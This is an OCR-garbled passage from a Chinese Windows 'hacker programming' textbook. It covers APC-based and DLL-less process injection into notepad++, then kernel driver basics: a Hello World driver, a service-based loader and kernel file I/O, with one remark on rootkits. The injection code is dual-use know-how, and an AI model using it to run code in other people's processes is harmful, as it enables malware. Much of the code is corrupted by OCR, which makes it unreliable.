char szModuleFileName [MAX PATH] = { 0 }; 
MyGetModuleFileName (NULL, szModuleFileName, MAX PATH); 


MyMessageBox (NULL, pData->Str, szModuleFileName, MB OK); 


return 0» 
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线程 函数 的 代码 显得 很 乱 ， 但 是 只 要 仔细 看 还 是 能 看 明白 。 线 程 函 数 里 的 内 容 都 没有 超 
出 前 面 的 知识 范围 ， 只 是 有 些 函 数 的 定义 是 C 语言 中 的 语法 知识 。 

上 面 就 是 无 DLL 注入 的 全 部 代码 ， 编 译 连接 并 
运行 它 。 启 动 一 个 记事 本 程序 来 进行 测试 ， 可 惜 报 
错 了 。 问 题 出 在 哪里 呢 ? VC6 的 默认 编译 是 Debug 
版 本 ， 这 样 会 加 入 很 多 调试 信息 。 而 某 些 调试 信息 
并 不 存在 于 代码 中 , 而 是 在 其 他 DLL 模块 中 。 这样 ， 
当 执 行 到 调试 相关 的 代码 时 会 访问 不 存在 的 DLL 
模块 中 的 代码 ， 就 导致 了 报错 。 

将 以 上 代码 使 用 Release 方式 进行 编译 连接 ， 然 
后 可 以 无 误 地 执行 ， 如 图 3-33 所 示 。 图 3-33 ”Release 方式 下 编译 注入 成 功 








Ey 广 : 编译 的 Debug 版 也 可 以 进行 无 DLL 的 注入 ， 只 是 实现 起 来 略 有 不 同 。 


3.5.3 ”异步 过 程 调用 


APC (Asynchronous Procedure Call) 是 异步 过 程 调用 ， 在 Windows 下 每 个 线程 在 可 被 唤 
醒 时 在 其 APC 链 中 的 函数 将 有 机 会 执行 被 执行 ， 每 一 个 线程 都 具有 一 个 APC 链 。 那 么 只 要 
在 可 以 在 APC 链 中 添加 一 个 APC， 就 可 以 完成 我 们 所 需要 的 DLL 注入 的 功能 。 
1， 关键 API 函数 
无 论 使 用 远程 线程 ， 还 是 使 用 APC 都 去 使 用 了 Windows 提供 的 API 函数 。 对 于 远程 线 
程 注 入 DLL 时 ， 我 们 使 用 了 Windows 下 的 CreateRemoteThread() 函 数 。 而 要 在 APC 链 中 增 
加 一 个 APC 时 ， 所 使 用 的 函数 是 QueueUserAPC() 函 数 。 
该 函数 的 定义 如 下 : 
DWORD WINAPI QueueUserAPC!( 
_In PAPCFUNC pfnAPC; 
_In HANDLE hThread, 
, In_ ULONG_PTR dwpata 
该 函数 有 三 个 参数 ， 相 对 于 创建 远程 线程 CreateRemoteThread() 函 数 而 言 少 了 许多 参数 ， 
具体 参数 说 明 如 下 。 
pfnAPC: 指向 一 个 APC 函数 的 地 址 。 
hThread: 指定 目标 线程 的 句柄 。 
dwData: 传递 给 pfnAPC 指向 函数 的 参数 。 


对 于 pfnAPC 指向 的 APC 函数 的 定义 形式 如 下 : 
VOID CALLBACK APCProc( 
_In ULONG PTR dwParam 
) 
2. APC 注入 DLL 实现 
APC 注入 DLL 与 远程 线程 注入 DLL 的 流程 基本 类 似 ， 提 升 进 程 的 权限 、 通 过 进程 名 称 
得 到 进程 的 PID， 然 后 进行 注入 。 





中 





3.5 ”DLL 编程 





在 前 面 的 内 容 中 已 经 实现 了 提升 进程 的 权限 ， 即 DebugPrivilege() 函 数 。 同 时 ， 在 前 面 也 
实现 了 通过 进程 名 称 得 到 进程 的 PID， 即 GetProcId(0) 函 数 。 主 要 需要 实现 的 就 是 APC 注入 
DLL 的 部 分 。 


VOID CAPCInjectDlg::InjectDil (DWORD dwPid, char* szDilName) 


{ 


if ( dwPid == 11 lstrlien(szDllName) == 0 ) 
{ 
Yeturn 


} 
// 计算 欲 注入 DIE 文件 完整 路 径 的 长 度 


int nDliLen = lstrlen(szDllName) + sizeof (char); 


/7 打开 目标 进程 
HANDLE hProcess = OpenProcess (PROCESS ALL ACCESS， 
FALSE, dwPid); 


if ( hProcess == NULEL ) 
. 
em LT7 


// 在 且 标 进程 申请 一 块 长 度 为 nDllLen 大 小 的 内 存 空间 
PVOID pDilAddr = VirtualAllocEx (hProcess, 
NULLE, nDllLen, 
MEM. COMMIT, 
PAGE READWRITE); 


if ( pDllAddr == NULE ) 

{ 
CloseHandle (hpProcess)’; 
return ;» 


} 


DWORD dwWriteNum = 0; 


// 将 欲 注入 DLL 文件 的 完整 路 径 写 入 在 目标 进程 中 申请 的 空间 内 
WriteProcessMemory (hProcess, PpDllAddr, szDllName, 
nDllLen, &dwWriteNum); 


CloseHandle (hpProcess); 


THREADENTRY32 te 三 { 0 1}; 
te.dwSize = sizeof (THREADENTRY32); 
// 得 到 线程 快照 
HANDLE handleSnap = CreateToolhelp32Snapshot (TH32CS SNAPTHREAD, 0); 
if ( INVALID HANDLE VALUE == handleSnap ) 
{ 
CloseHandle (hpProcess); 
return 了 
} 


char *pFunName = "LoadLibraryA"’} 
// 获得 LoadLibraryA() 函数 的 地 址 
FARPROC pFunAddr = GetProcAddress (GetModuleHandle("kernel32.d11"), PEunName) 


DWORD dwRet = 0; 
// 得 到 第 一 个 线程 
if ( Thread32First (handleSnap, &te) ) 
{ 
do 


// 进 行进 程 ID 对 比 


if ( te.th320wnerProcessID == dwPid ) 
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// 得 到 线程 句柄 
HANDLE hThread = OpenThread( 
THREAD ALL ACCESS, 
FALSE, 
te.th32ThreadID); 
if ( hrhread ) 
/7 向 线程 插入 APC 
dwRet = QueueUserAPC( 
(PAPCFUNC) pFunAddr, 
hThread, 
(ULONG_ PTR)pD11Addr); 
/7 关闭 句 栖 
CloseHandle (hThread) 
} 


} 
// 循 环 下 一 个 线程 ; 
} while (Thread32Next (handleSnap, &te)); 


} 
CloseHandle (handleSnap); 
} 


通过 APC 注入 DLL 的 流程 步骤 大 致 如 下 。 

G 将 需要 加 载 的 DLL 的 完整 路 径 写 入 目标 进程 空间 。 

@ 获得 LoadLibraryA(0) 函 数 的 地 址 ， 当 然 也 可 以 是 LoadLibraryW0 函 数 的 地 址 。 

@) 枚 举目 标 进程 中 的 所 有 线程 ， 为 每 个 线程 添加 一 个 APC 函数 。 之 所 以 给 每 个 线程 增 
加 一 个 APC 函数 , 原因 是 我 们 无 法 明确 得 知 线程 改变 状态 的 具体 时 机 ， 因 此 为 每 个 线程 增加 
一 个 APC 函数 ， 这 样 增加 了 注入 成 功 的 机 会 

编译 运行 ， 然 后 将 前 面 内 容 的 FirstDll.dll 文件 注入 到 notepad++.exe 进程 中 ， 如 图 3-34 
所 示 。 通 过 图 3-34 可 以 看 到 DLL 文件 被 成 功 注 入 。 为 了 进一步 验证 ， 打 开 Process Explorer 
程序 ， 单 击 菜单 上 的 “Find” 选择 “Find Handle or DLL” 菜 单项 ， 如 图 3-35 所 示 。 通 过 3-35 
可 以 看 出 ，FirstDll.dll 文件 已 经 被 成 功 的 进入 了 notepad++.exe 进程 当中 了 。 
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3-34 APC 注入 DLL 图 3-35 通过 Process Explorer 查看 注入 的 DLL 
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3.6 总结 


本 章 学 习 了 Windows 系统 下 应 用 程序 的 编程 基础 ,包括 文件 操作 、 注 册 表 操作 、 服 务 操 
作 、 进 程 、 线 程 和 DLL 相关 的 编程 内 容 。 本 章 的 内 容 虽 然 简单 ， 但 是 对 于 黑客 编程 或 者 是 开 
发 Windows 下 的 应 用 程序 来 说 都 是 常用 的 知识 。 

在 进行 逆向 分 析 时 ， 如果 能 够 掌握 大 量 的 Windows 系统 API 函数 ,那么 逆向 分 析 时 会 越 
容易 。 因 为 在 进行 逆向 时 ， 往 往 是 通过 某 个 已 知 的 内 容 逐 步 去 分 析 的 ， 而 不 是 从 头 开 始 进行 
分 析 的 ， 那 么 知道 API 函数 所 提供 的 功能 ， 那 么 就 可 以 通过 API 函数 为 入 手 点 来 对 程序 进行 
道 向 分 析 。 对 于 进行 病毒 分 析 或 是 在 软件 破解 时 ， 文 件 、 目 录 、 注 册 表 、 进 程 、 线 程 等 操作 
是 更 是 常见 的 。 希 望 读者 可 以 在 本 章 介绍 的 API 基础 上 继续 深入 学 习 。 

最 后 简单 说 明 一 下 ， 文 件 、 注 册 表 、 进 程 、 远 程 线程 注入 等 技术 多 被 病毒 等 程序 使 用 ， 
那么 如 何 对 其 进行 防护 呢 ? 最 简单 的 方法 就 是 对 操作 这 些 资 源 的 API 函数 进行 挂钩 ， 在 钩子 
函数 中 对 其 进行 检测 ， 则 可 以 进行 预防 。 比 如 ， 当 感染 型 病毒 将 恶意 代码 插入 到 所 有 的 exe 
文件 时 ， 那 么 就 会 去 遍历 所 有 exe 文件 ， 遍 历 的 过 程 中 会 逐个 打开 每 个 exe 文件 并 写 入 恶意 
代码 , 这 样 通 过 对 遍历 文件 的 API 函数 挂 钧 和 写 入 文件 的 API 函数 挂钩 就 可 以 起 到 预防 的 作 
用 。 通 常 ， 很 少 会 有 程序 遍历 每 个 文件 后 会 对 程序 进行 写 入 操作 ， 在 这 种 情况 下 就 可 以 视 其 
为 恶意 程序 了。 当然 了 ， 病 毒 感 染 文件 也 可 能 不 会 遍历 文件 ， 比 如 病毒 只 感染 准备 运行 的 程 
序 ， 这 样 可 以 避免 大 量 的 文件 操作 ， 也 不 会 占用 大 量 的 系统 资源 等 。 

至 于 什么 是 挂钩 ， 什 么 是 钩子 函数 ， 在 后 面 的 章节 会 进行 介绍 。 
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在 Windows 操作 系统 中 的 很 多 系统 处 理 都 是 在 内 核 下 进行 和 完成 的 。 在 内 核 中 实现 功能 
就 需要 编写 驱动 模块 ， 驱 动 模块 加 载 入 内 核 后 就 可 以 算是 工作 在 和 操作 系统 几乎 平 级 的 平台 
上 运行 了 。 提 到 驱动 可 能 会 想到 硬件 ， 大 部 分 计算 机 的 使 用 者 都 会 简单 地 认为 驱动 程序 是 控 
制 硬件 的 。 其实， 在 Windows 系统 下 ， 驱 动 并 不 单单 是 用 来 控制 硬件 设备 的 。Windows 操作 
系统 中 的 驱动 程序 可 以 创建 虚拟 设备 ， 也 可 以 与 具体 设备 毫 无 关系 。Windows 操作 系统 是 一 
个 开放 式 的 操作 系统 ， 这 个 开放 式 并 不 是 指 它 开 放 源 代码 ， 而 是 指 通过 其 提供 的 接口 可 以 很 
容易 、 很 方便 地 对 内 核 进行 扩展 。 

前 3 章 介 绍 的 都 是 Windows 应 用 层 下 的 软件 开发 ， 本 章 将 介绍 Windows 操作 系统 内 核 
层 下 的 驱动 开发 。 近 几 年 在 安全 方面 ,掌握 内 核 驱动 的 开发 越 来 越 重要 , 无 论 是 网 络 防火 墙 、 
主动 防御 系统 、 透 明 加 密 系统 ， 还 是 病毒 、 木 马 ， 反 病毒 、 反 木马 等 ， 都 已 经 从 应 用 层 转 向 
了 内 核 层 ， 进 行 更 深层 次 的 较量 。 

要 开发 Windows 下 的 驱动 程序 ， 需 要 下 载 安 装 Windows 下 的 驱动 开发 包 ， 即 WDK 
(Windows Driver Kit)。 微 软 免费 提供 下 载 该 开发 包 ， 里 面 附 带 了 开发 驱动 的 头 文件 、 帮 助 文 
档 、 工 具 及 大 量 的 文档 等 内 容 。 笔 者 介绍 本 书 使 用 的 版 本 是 DDK 3790.1830 和 WDK 
7600.16385.0。 本 章 不 介绍 过 多 的 理论 知识 ,而 是 直接 编写 代码 。 本 书 不 是 系统 的 专门 介绍 某 
种 语言 或 开发 包 的 书籍 , 目的 在 于 掌握 使 用 的 方法 。 本 书 更 不 是 专注 于 讲述 驱动 开发 的 书籍 。 
读者 如 果 想 要 深入 学 习 驱 动 开发 的 知识 ， 请 参考 专门 的 驱动 开发 书籍 。 


4.1 驱动 版 的 “Hello World” 


“Hello World” 算 是 一 个 经 典 的 程序 ， 之 所 以 经 典 ， 不 在 于 它 的 难度 ， 而 是 在 于 几乎 每 个 
语言 程序 设计 入 门 书籍 的 第 一 个 例子 都 会 讲 到 它 。 这 里 也 继续 沿用 这 种 习惯 ， 写 一 个 内 核 驱 
动 版 的 “Hello World” 例 子 。 


4.1.1 驱动 版 “Hello World” 代 码 编写 


前 面 的 章节 中 介绍 了 Windows 下 C 语言 开发 的 入 口 WinMain() 函 数 、DLL 开发 的 入 口 
DllMain(0) 函 数 ， 而 驱动 程序 开发 的 入 口 又 发 生 了 改变 ， 先 来 看 看 代码 : 








4.1 驱动 版 的 “Hello World” 





#include <ntddk.h> 
VOID DriverUnload (PDRIVER OBJECT pDriverOjbect) 
{ 

KdPrint ({("DriverUnload Routine!\r\n")):; 


} 


NTSTATUS DriverpEntry ( 
PDRIVER OBJECT pDriverObiject, 
PUNICODE STRING pRegistryPath) 


Kdprint( ("SS\r\n", pDriverObject->DriverName.Buffer)); 
pDriverObject->DriverUnload = DriverUnload; 


return STATUS SUCCESS,; 

} 

在 开发 驱动 时 ， 不 再 使 用 main0、WinMain0 和 DIIMain() 作 为 入 口 函 数 ， 取 而 代 之 的 是 
使 用 DriverEntry0) 函 数 做 驱动 程序 的 入 口 函 数 。DriverEntry0 函 数 在 WDK 自 带 的 帮助 文档 中 
定义 如 下 : 

NTSTATUS 

DriverEntry'( 
_in struct _DRIVER OBJECT *DriverObject, 
__in PUNICODE STRING RegistryPath 


) 
{ } 


在 WDK 的 帮助 文档 中 可 以 找到 很 多 DriverEntry0 函数 的 定义 ， 这 里 给 出 的 是 
DriverEntry[WDK kernel] 的 定义 。DriverEntry() 函 数 有 两 个 参数 ， 说 明 如 下 。 

DriverObject: 该 参数 是 一 个 由 操作 系统 传 入 指向 DRIVER_OBJECT 结构 体 ( 驱 动 对 象 
结构 体 ) 的 指针 。 

RegistryPath: 该 参数 是 一 个 UNICODE 字符 串 ， 指 向 此 驱动 负责 的 注册 表 子 键 ， 该 子 键 
用 于 方便 保存 当前 驱动 程序 的 配置 等 信息 的 操作 。 

这 里 的 程序 中 用 到 了 其 中 第 1 个 参数 ，DRIVER_OBJECT 结构 体 的 定义 如 下 : 

typedef struct DRIVER OBJECT { 


CSHORT Type; 
CSHORT Size; 


/i 
// 在 一 个 列表 上 连接 单个 驱动 程序 创建 的 设备 ，Flags 字 为 驱动 程序 对 象 提供 一 个 可 扩展 的 标注 位 置 
A 


PDEVICE OBJECT DeviceObject; 
ULONG Flags; 


/1 
// 描述 加 载 驱 动 程序 的 位 置 ，count 字段 用 于 统计 驱动 程序 调用 其 注册 的 重新 初始 化 例 程 的 次 数 
// 


PVOID DriverStart; 

ULONG DriverSize; 

PVOID DriverSection; 

PDRIVER EXTENSION DriverExtension; 


// 
// 错误 日 志 线程 使 用 驱动 程序 名 称 字段 确定 绑 定 I/0 请 求 的 驱动 程序 的 名 称 
/7 


UNICODE _ STRING DriverName; 





主 膝 由 忆 地 岗 营 娃 啊 钼 山上 坦 
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A/ 
// 下 面 是 注册 支持 ， 这 是 一 个 指向 注册 表 中 硬件 信息 路 径 的 指针 
x 


PUNICODE STRING HardwareDatabase; 


// 

// 下 面包 含 一 个 可 造 的 指针 ， 它 指向 快速 工 /0 支持 的 驱动 程序 的 另 一 个 入 口 点 数组 ， 人 快速 I/0 由 驱动 程序 
// 例 程 直接 调用 ， 而 不 使 用 标准 IRP 调用 机 制 ， 注 意 ， 这 些 函 数 只 用 于 同步 T/O 和 缓存 文件 的 情况 

Dp 


PFAST IO. DISPATCH BastIoDispatch: 


A 

// 下 面 是 特定 驱动 程序 的 另 一 个 入 口 点 ， 注 意 ， 主 浮 数 调用 表 必 须 是 对 象 中 最 后 一 个 字段 ， 以 便 它 仍然 
// 可 扩展 

/7 


PDRIVER INITIALIZE Driverinit; 

PDRIVER STARTIO DriverSstartIo; 

PDRIVER UNLOAD DriverUnload; 

PDRIVER DISPATCH MajorFunction[IRP MJ MAXIMUM FUNCTION + 1]; 


} DRIVER OBJECT; 
typedef struct DRIVER OBJECT *PDRIVER OBJECT; // ntndis 


该 定义 在 WDK 目录 下 的 inc\ddK\ 目 录 中 的 wdm.h 头 文件 中 ， 虽 然 在 WDK 的 帮助 文档 
中 有 该 结构 体 的 介绍 ， 但 是 笔者 并 没有 找到 关于 该 结构 体 的 具体 定义 。 无 法 在 文档 中 找到 定 
义 的 情况 下 ， 只 能 选择 查看 头 文件 了 。 

上 面 的 代码 中 用 到 了 DRIVER_OBJECT 结构 体 中 的 几 个 成 员 变 量 ， 分 别 是 DriverUnload 
和 DriverName。 

DriverUnload 是 一 个 指向 用 来 卸载 驱动 的 函数 。 御 载 驱 动 的 工作 是 由 Windows 操作 系统 
完成 的 ， 因 此 该 函数 是 一 个 回调 函数 ， 用 来 完成 对 驱动 资源 的 释放 工作 。 该 函数 的 定义 格式 
如 下 : 


VOID 
Unload( 
Luin struct LDRIVER OBIECT | Driverobiect 


) 
{ } 


印 载 例 程 中 同样 也 用 到 了 PDRIVER_OBJECT 结构 体 ， 几 乎 所 有 的 驱动 程序 都 要 指定 卸 
载 例 程 以 保证 驱动 程序 的 正常 和 卸载。 当然 ， 如 果 写 的 是 Rootkits 的 话 ， 需 要 让 内 核 驱动 程序 
常 驻 内 存 而 不 希望 被 卸载 掉 ， 则 无 须 指 定 印 载 例 程 。 

DriverName 是 一 个 UNICODE STRING 结构 体 变量 ， 指 向 驱动 的 名 称 。UNICODE 
_STRING 结构 体 的 定义 如 下 : 


typedef strict _UNICODE STRING { 
USHORT Length; 
USHORT MaximumLength; 
PWSTR Buffer; 

} UNICODE STRING, *PUNICODE STRING; 


UNICODE_STRING 结构 体 的 Buffer 里 保存 了 驱动 的 名 称 ， 其 它 两 个 变量 里 保存 了 驱动 
名 称 字 符 串 的 长 度 和 最 大 长 度 。 

上 面 代码 中 的 内 容 已 经 基本 介绍 完 ， 还 剩 下 一 个 KdPrint(0) 函 数 没 有 介绍 ， 该 函数 的 用 法 
类 似 printf0) 函 数 的 用 法 。 











4.1 驱动 版 的 “Hello World” 


4.1.2 ”驱动 程序 的 编译 


通过 两 种 方式 编译 源 代码 , 第 1 种 方式 是 通过 VC6 进行 编译 , 第 2 种 方法 是 使 用 命令 行 
的 方式 进行 编译 。 使 用 VC6 进行 编译 的 方法 较为 简单 ， 只 要 安装 一 个 “Driver Wizard” 的 驱 
动 开 发 向 导 就 可 以 进行 编译 连接 ， 这 里 不 做 介绍 ， 请 读者 自行 安装 。 


/py 注 : VC6 下 编写 驱动 程序 使 用 DDK 3790.1830。 


重点 介绍 通过 命令 行 的 方式 进行 编译 连接 驱动 程序 。 

在 开始 菜单 的 程序 下 找到 安装 WDK 的 菜单 ， 如 “Windows Driver Kits->WDK 7600. 
16385.0->Build Environments->Windows XP->x86 Checked Build Environment”。WDK 的 安装 
菜单 中 除了 针对 Windows XP 系统 的 编译 连接 环境 以 外 ， 还 有 Windows 2003、Win7 等 相关 
的 其 它 编 译 环境 。 

在 驱动 编译 的 环境 中 有 两 种 版 本 ， 分 别 是 Checked 版 和 Free 版 。 这 两 种 版 本 类 似 于 VC 
集成 开发 环境 下 编译 连接 的 Debug 版 和 Release 版 ， 只 是 叫 法 不 同 而 已 。 


spy 注 : 编译 驱动 程序 时 ， 根 据 驱动 程序 的 目标 平台 编译 使 用 相应 的 编译 环境 。 


在 命令 行 下 编译 需要 编译 脚本 ， 编 译 脚 本 有 两 个 ， 分 别 是 “makefilg” 和 “sources”。 这 
两 个 文件 都 没有 扩展 名 ， 其 内 容 都 是 文本 。 这 两 个 脚本 不 用 自己 编写 ， 只 需要 找到 现成 的 修 
改 即 可 。 在 WDK 提供 的 例子 程序 中 找到 编译 脚本 ， 比 如 在 “\7600.16385.0\sre\filesys\miniFilter 
\cancelSafe\” 目 录 下 找到 这 两 个 文件 ， 复 制 到 编写 的 驱动 程序 的 目录 下 。 修 改 “sources” 编 
译 脚 本 ， 另 外 一 个 保持 原样 。Sources 文件 修改 后 如 下 : 


TARGETNAME=DriverHello 
TARGETTYPE=DRIVER 
SOURCES=DriverHello.c 


简单 解释 一 下 ， 第 1 行 是 编译 连接 后 驱动 的 文件 名 ， 第 2 行 是 编译 后 生成 的 文件 类 型 ， 
DRIVER 表示 驱动 类 型 ， 第 3 行 是 需要 编译 连接 的 源 代 码 文件 。 修 改 后 保存 ， 就 可 以 通过 命 
令 行 进 行 编译 连接 了 。 

在 编译 命令 行 环境 下 切换 到 编写 好 的 驱动 目录 下 ， 输 入 命令 build/g， 如 图 4-1 所 示 。 





图 4-1 驱动 的 编译 连接 结果 输出 


编译 成 功 后 ， 会 在 命令 行 的 输出 中 看 到 如 “1 executable built” 的 提示 ， 表 示 编 译 连接 成 
功 。 到 驱动 的 代码 目录 下 找 刚 编译 好 的 驱动 程序 ， 其 所 在 目录 为 “DriverHello\objchk 
_wxp X86\i386@\”， 扩 展 名 为 .sys、 文 件 名 为 DriverHello 的 文件 就 是 编译 连接 生成 好 的 驱动 文件 。 
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4.1.3 ”驱动 文件 的 装载 与 输出 


.sys 的 文件 是 无 法 直接 通过 双击 运行 的 (类 似 DLL 文件 一 样 ， 无 法 直接 执行 )， 需 要 通 
过 驱动 装载 工具 使 其 运行 。 这 里 使 用 的 工具 是 一 款 名 为 “KmdManager” 的 EXE 文件。 除了 
需要 把 驱动 加 载 到 内 存 以 外 ， 还 要 来 查看 驱动 的 输出 。 由 于 驱动 没有 界面 ， 因 此 无 法 直接 查 
看 其 输出 的 内 容 。 这 里 需要 借助 “DbgView” 工 具 来 查看 驱动 的 输出 信息 。 

下 面 来 具体 操作 一 遍 。 打 开 KmdManager 和 DbgView 两 个 工具 ， 将 驱动 程序 拖 电 至 
KmdManager 中 ,然后 单 击 “Register” 加 载 驱动 ， 单 击 “Run” 运 行 驱 动 程序 。 查 看 DbgView 
中 有 字符 串 输 出 ， 正 是 在 DriverEntry() 中 输出 的 字符 串 。 单 击 “Stop” 停 止 驱动 程序 的 运行 ， 
并 单 击 “Unregister” 御 载 驱动 程序 ， 再 次 观察 DbgView 程序 ， 会 看 到 在 DriverUnload() 中 输 
出 的 字符 串 ， 如 图 4-2、 图 4-3 所 示 。 























| DebugView on \\ JESTER- da ho . 
人 Computsr sp 
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1 2.03778529 lito a a Bl 











图 4-2 通过 KMD 加 载 驱动 程序 图 4-3 通过 DbgView 观察 驱动 的 调试 输出 


通过 以 上 所 有 步 又， 逐步 完成 了 HelloWorld 驱动 程序 的 编写 、 编 译 连接 、 加 载运 行 和 观 
察 调试 输出 。 但 是 ， 对 于 自己 写 好 的 内 核 驱 动 程序 ， 如 果 在 随 软件 发 布 时 需要 用 户 自行 通过 
KMD 工具 装载 的 话 ， 就 非常 不 方便 了 。 


4.1.4 驱动 程序 装载 工具 实现 


驱动 程序 的 加 载 主要 通过 服务 控制 管理 程序 来 完成 。 服 务 相 关 的 编程 在 前 面 的 章节 中 已 
经 有 所 介绍 ， 本 章 通过 前 面 介绍 的 内 容 来 编写 一 个 用 于 加 载 驱动 程序 的 工具 。 先 来 看 一 下 装 
载 程序 完成 后 的 界面 ， 如 图 4-4 所 示 。 








me ebug 由 
0.00000000 \Driver\DriverHel 
2.55231118 Driverlmnload Rout 











图 4-4 ”装载 程序 








4.1 驱动 版 的 “Hello World” 





装载 程序 的 编写 分 为 两 部 分 ， 分 别 是 驱动 程序 的 装载 和 驱动 程序 的 印 载 。 分 别 来 看 一 下 
这 两 个 函数 代码 。 装 载 驱 动 的 代码 如 下 : 


void CLoadNtDriverDlig:':OonLoad{) 

{ 
// TODO: Add your econtrol notification handler code here 
char szDriverPath [MAX PATH]; 
char .szFileName [MAXBYTE]; 


SC_HANDLE hsSem; 
SC HANDLE hService; 


GetDlgItemText (IDC DRIVER_PATH, szDriverpath, MAX PATH); 
// 获得 驱动 的 文件 名 
::_ splitpath (SSzDriVezPath，NUEE，NULEI，SzRIeNarme，， NULL); 


// 打开 服务 控制 管理 器 
hsem = OpensCManager (NULL, NULL, SC MANAGER ALL ACCESS); 


// 创建 驱动 所 对 应 的 服务 

hsService = CreateService (hScm, szFileName, szFileName, 
SERVICE ALL _ACCESS, 
SERVICE KERNED DRIVER， 
SERVICE DEMAND START, 
SERVICE ERROR IGNORE, 
szDriverPath, NULL, NULL, 
NULE, NULL, NULL); 


// 启动 服务 
StartService(hService, NULL, NULL); 


// 关闭 句柄 
CloseServiceHandle (hService); 
CloseServiceHandle (hScm); 

} 


对 于 加 载 驱动 的 代码 ， 这 里 实现 得 并 不 好 ， 因 为 代码 中 没有 做 任何 的 判断 ， 不 知道 最 关 
键 的 CreateService() 函 数 的 调用 成 功 与 否 ， 而 且 在 调用 该 函数 失败 时 ， 根 据 失 败 的 原因 也 有 
一 些 需 要 人 处理 的 部 分 。 为 了 使 代码 简洁 ， 没 有 做 任何 的 返回 值 判 断 。 这 里 在 具体 的 使 用 过 程 
中 ， 请 读者 多 加 注意 。 

全 载 驱动 的 代码 如 下 : 


void CLoadNtDriverDlg:;:OnUnload'() 
{ 
// TODO: Add your control notification handler code here 
char szDriverpath[lMAX PATH]; 
char szFileName [MAXBYTE]; 


SC HANDLE hSem; 
SC HANDLE hService; 


SERVICE STATUS statis; 


GetDlgItemText (IDC_ DRIVER PATH, szDriverpath, MAX PATH); 
// 获得 驱动 的 文件 名 
::_ Splitpath(szDriverpath, NULL,: NULL, szFileName, NULL)» 


// 打开 服务 控制 管理 器 

hscm = OpenSCManager (NULL, NULL, SC_ MANAGER ALL ACCESS); 

// 打开 驱动 对 应 的 服务 

hService = OpenService(hScm, szFileName, SERVICE ALL _ ACCESS) ; 
// 停止 驱动 

ControlService(hService, SERVICE CONTROL STOP, &status); 

// 印 载 驱动 程序 


DeleteService(hService); 
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/7 关闭 句柄 
CloseServiceHandle (hsService): 
CloseServiceHanale (phpScm) ， 


} 

补充 : 

常见 的 Windows 驱动 程序 分 成 两 类 ， 一 类 是 不 支持 即 插 即 用 功能 的 NT 式 驱 动 程序 ， 男 
一 类 是 支持 即 插 即 用 的 WDM 式 驱 动 程序 。NT 式 驱 动 程序 的 安装 是 基于 服务 的 ，WDM 式 的 
驱动 程序 需要 INF 文件 进行 安装 。 


4.2 内核 下 的 文件 操作 


在 内 核 中 不 能 调用 用 户 层 的 Win32 API 函数 来 进行 文件 相关 的 操作 ， 而 必须 使 用 内 核 层 
提供 的 对 文件 操作 相关 的 内 核 函 数 。 本 节 通 过 一 个 简单 的 对 文件 读 写 的 例子 ， 介 绍 对 文件 操 
作 的 内 核 函 数 。 


4.2.1 内 核 文件 的 读 写 程序 


在 内 核 中 进行 读 写 有 一 套 区 别 于 Win32 API 的 文件 相关 的 函数 。 内 核 层 要 低 于 应 用 层 ， 
更 接近 于 CPU。 前 面 已 经 介绍 了 Win32 编程 中 常见 的 编程 函数 ， 同 样 也 介绍 了 Win32 下 关于 
文件 读 写 的 相关 API 函数 。 有 了 前 面 的 基础 知识 ， 读 者 对 内 核 下 的 文件 读 写 函 数 也 不 会 太 陌生 。 
先 来 看 一 个 在 内 核 下 进行 文件 读 写 的 代码 ， 然 后 对 代码 中 用 到 的 内 核 函 数 一 一 进行 介绍 。 

代码 如 下 : 


#include <ntadk.h> 
#4defirnel FILENAME LNN\2NNe:\Na, txtn 
#define BUFFERLEN 10 








VOID DriverUnload (PDRIVER OBJECT pDriverObject) 
{ 
} 


VOID CreateFileTest () 
{ 
NTSTATUS status = STRTUS_SUCCRSS7 


OBgECT ATTRIBUTES ObDJAttriobute, 
IQ, STATUS_ BLOCK ioStatusBlock; 


UNICODE STRING unirFile; 
HANDLE hrile = NULL; 
RtliIinitUunicodestring(&uniFile, FILENAME).; 


/7 初始 化 一 个 对 象 属性 
initializeObjectAttributes(tO0bDIAttribute, 
&UniFile, 

OBJ CASE INSENSTTIVE., 
NULL, 
NULL); 


// 创建 文件 


status = ZwCreateFile(ghFile, 
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sizeof (FILE STANDARD. INFORMATION), 
FilestandardIinformation)’; 





第 // 输出 新 创建 的 文件 是 否 是 目录 
章 rdqPprinm(l is Direouory. Se Ne Nn ton Dneobory))r 
到 /分 配 空间 
客 Buffer = ExAllocatePool (PagedPool, BUFFERLEN); 
内 EF i Bat fen == "NUD ) 
核 { 
驱 ZwClose (hrFile); 
动 Teturn » 
开 } 
2 /7 填充 值 为 
础 RtipillMemory (Buffer, BUEPFERLREN, Ox6l); 
PO ei 
status = ZwWriteFile (hrile, 
NULL, 
[0 NULL,, 
NDOTL, 
&ioSstatusBlock, 
Bufféer, 
BUFFERLEN, 
0， 
NULL); 


fn NT SSUESS(eteatus) ly 
L 

Kaprintt ("writerile SuccesstEayly LT NEN ys 
1 


// 释放 申请 的 空间 
pxEreepool (Butter) 7 


77 获取 文件 属性 
status = 2woueryInEormationgile (hpFEiley 
&ioSstatusBlock, 
&fsi, 
sizeof (FILE STANDARD INFORMATION), 
FileSstandardInformation)’; 


// 输出 新 创建 的 文件 是 否 是 目录 
KAdprint( ("Filesize = %d \r\n", (IONG) fsi .EndOfFile.Quadpart)):; 


Buffer = ExAllJocatePool (PagedPool, (fsi.EndOfFile.QuadPart * 2)); 
if ( Buffer == NULYL ) 
{ 

KodPrint(( ExAllocatePpooLl. UnSuceesstully NeNA"))y 

ZwClose (Rile) : 

return s 


fpi,.CurrentByteOffset.QuadPart = 0; 

// 设置 文件 指针 

status = 2wSetInformationFile(hRile， 
wioStatisBlock, rpily 
sizeof (FILE POSITION INFORMATION), 
FrilePpositLiontintormation)s 


/7 读 取 文件 内 容 

status'= 2wReadEile (pile NULL,, NULE, NULL, 
&ioSstatusBlock, ‘Buffer; 
(LONG) fsi.EndOfrFile.QuadPart, 
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NUELL, NULL); 
if ( NT SUCCESS (status) ) 
{ 
KdPrint (("ZwReadFile Successfully ! \r\n")); 
} 
KAPrint (("%s", Buffer)): 
ExFreePool (Buffer)’; 
ZwClose (hFile); 
} 
NTSTATUS DriVerErtty(PDRIVER_OBJECT pDriverObject, 
PUNICODE STRING pRegistryPath) 
{ 
pDriverObject->DriverUnload = DriverUnload; 
CreaterileTest(); 
OpenFileTest(); 


return STATUS SUCCESS; 


} 
将 上 面 的 代码 在 控制 台 下 进行 编译 连接 ， 然 后 用 KMD 进行 加 载 ， 在 DbgView 中 观察 驱 
动 的 调试 输出 ， 如 图 4-5 所 示 。 


BE 
0. 00000000 File Create ok ! 









